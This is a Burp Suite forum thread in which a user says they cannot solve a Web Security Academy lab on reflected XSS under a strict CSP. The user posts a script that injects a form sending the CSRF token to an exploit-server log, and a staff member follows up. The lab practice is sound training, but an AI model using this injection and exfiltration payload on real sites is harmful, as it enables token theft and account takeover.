Burp Suite User Forum

Create new post

Lab not solve - Reflected XSS protected by very strict CSP, with dangling markup attack

Yuyu | Last updated: Sep 30, 2024 02:20PM UTC

Tried https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/ and customized script <script> location='https://0ab30080033b6b968b73f4a50058006d.web-security-academy.net/my-account?email="></form><form class="login-form" name="evil-form" action="https://exploit-0a590010031d6bdf8b5bf31f01490052.exploit-server.net/log" method="GET"><button class="button" type="submit">Click</button'; </script> the bot didn't click the button and leak CSRF token.

Ben, PortSwigger Agent | Last updated: Oct 02, 2024 10:49AM UTC

Hi, Are you still having issues with this lab as of right now?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.